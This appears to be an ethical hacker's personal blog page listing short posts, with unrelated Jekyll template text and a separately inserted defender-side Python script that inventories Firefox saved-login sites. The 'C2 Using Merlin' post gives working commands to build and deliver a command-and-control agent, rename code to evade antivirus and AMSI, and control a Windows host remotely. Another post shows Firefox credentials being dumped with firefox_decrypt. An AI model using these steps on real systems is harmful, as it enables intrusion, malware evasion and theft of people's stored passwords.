Hi there, my name is Joost van ‘t Zand. This page serves as a bit of an overview of me and my online presence. I am currently working as an ethical hacker.

Projects

Blog posts

  • Test_page

  • C2 Using Merlin

    To use Merlin, a Command & Control server written in Go, take the following steps:

    go version    # version should be 1.13 or higher
    sudo apt update && sudo apt install golang-go
    git clone https://github.com/Ne0nd0g/merlin && cd merlin
    
    
    ## Now replace ExecuteShell with MiniMice to trick virus scanners and AMSI
    ## and also hide Ne0nd0g from AMSI, as this is the developer
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/ExecuteShell/MiniMice/g'
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/executeShell/miniMice/g'
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g'
    sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g' go.mod
    
    
    ## Create an output directory and build the Merlin agent
    make agent-windows DIR="./output"
    
    ## Start the Merlin server listener
    go run cmd/merlinserver/main.go -i 0.0.0.0 -p 8443 -psk strongPassphraseWhaterYouWant
    
    ## Run a python HTTP Server to copy the Merlin agent to the Windows system
    cd /mnt/tools/merlin/output/
    python -m SimpleHTTPServer 80
    
    ## Run the Merlin agent on the Windows host
    merlinAgent-Windows-x64.exe -url https://172.16.216.135:8443 -psk strongPassphraseWhaterYouWant
    [+]New authenticated agent checkin for a0c86f61-4f21-4e63-9856-b73d7b8fbf3a
    
    ## Now we can interact with the agent:
    interact a0c86f61-4f21-4e63-9856-b73d7b8fbf3a
    
    help
    ls
    info
    cmd whoami
  • Deploying Gophish In Docker With Terraform And Aws

    Here is a video about how to deploy Gophish in a Docker container on a VPS in AWS that is deployed using Terraform.

  • Dump Firefox Credentials On Macos

    Dumping the credentials stored in the Firefox browser cache on macOS is possible using the following commands:

    git clone https://github.com/unode/firefox_decrypt
    cd firefox_decrypt
    python firefox_decrypt.py
    
    Select the Firefox profile you wish to decrypt
    1 -> Profiles/1v42l6gf.dev-edition-default
    2 -> Profiles/cunynfjm.default
    2
    
    Master Password for profile /Users/myuser/Library/Application Support/Firefox/Profiles/cunynfjm.default:
    2019-11-11 14:13:18,813 - WARNING - Attempting decryption with no Master Password
    
    Website:   https://www.hackthebox.eu
    Username: '<username>'
    Password: '******'
    
    Website:   http://webmail.mijndomein.nl
    Username: '<username>'
    Password: '******'
    
    Website:   https://www.t-mobile.nl
    Username: '<username>'
    Password: '******'
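
A defender-side inventory of the same profiles that firefox_decrypt lists, added here as an example that is not part of the original post or of firefox_decrypt: it reports which sites each profile holds saved logins for, without decrypting anything. The profiles.ini and logins.json layout and the function names are assumptions of this example, and the sample profiles are constructed.

```python
import configparser
import json
import tempfile
from pathlib import Path


def audit_firefox_root(root):
    """Map each profile in profiles.ini to the sites it holds saved logins for."""
    # Assumed layout: <root>/profiles.ini plus <profile>/logins.json
    root = Path(root)
    ini = configparser.ConfigParser(interpolation=None)
    ini.read(root / "profiles.ini", encoding="utf-8")
    report = {}
    for section in ini.sections():
        path = ini.get(section, "Path", fallback=None)
        if not section.startswith("Profile") or path is None:
            continue  # skip [General] and [Install...] sections
        relative = ini.get(section, "IsRelative", fallback="1") == "1"
        profile = root / path if relative else Path(path)
        try:
            data = json.loads((profile / "logins.json").read_text(encoding="utf-8"))
            logins = data.get("logins", [])
        except (OSError, ValueError, AttributeError):
            logins = []  # no saved logins, or an unreadable store
        report[path] = sorted({e.get("hostname", "?") for e in logins})
    return report


def build_sample(root):
    """Constructed sample: two profiles, one of them holding two saved logins."""
    root = Path(root)
    (root / "profiles.ini").write_text(
        "[General]\nStartWithLastProfile=1\n\n"
        "[Profile0]\nName=default\nIsRelative=1\nPath=Profiles/aaaa.default\n\n"
        "[Profile1]\nName=dev\nIsRelative=1\nPath=Profiles/bbbb.dev\n")
    for name, hosts in (("aaaa.default", ["https://example.org", "https://example.com"]),
                        ("bbbb.dev", None)):
        pdir = root / "Profiles" / name
        pdir.mkdir(parents=True)
        if hosts is not None:
            entries = [{"hostname": h, "encryptedUsername": "x", "encryptedPassword": "x"}
                       for h in hosts]
            (pdir / "logins.json").write_text(json.dumps({"logins": entries}))


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for prof, hosts in audit_firefox_root(tmp).items():
            print(f"{prof}: {len(hosts)} saved login(s) {hosts}")
```

On macOS the directory to pass is ~/Library/Application Support/Firefox; any profile that reports saved logins and has no Master Password set is readable in the way shown above.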
  • Welcome To My Blog

    Welcome……You’ll find this post in your _posts directory. Go ahead and edit it and re-build the site to see your changes. You can rebuild the site in many different ways, but the most common way is to run jekyll serve, which launches a web server and auto-regenerates your site when a file is updated.

    To add new posts, simply add a file in the _posts directory that follows the convention YYYY-MM-DD-name-of-post.ext and includes the necessary front matter. Take a look at the source for this post to get an idea about how it works.

    Jekyll also offers powerful support for code snippets:

    def print_hi(name)
      puts "Hi, #{name}"
    end
    print_hi('Tom')
    #=> prints 'Hi, Tom' to STDOUT.

    Check out the Jekyll docs for more info on how to get the most out of Jekyll. File all bugs/feature requests at Jekyll’s GitHub repo. If you have questions, you can ask them on Jekyll Talk.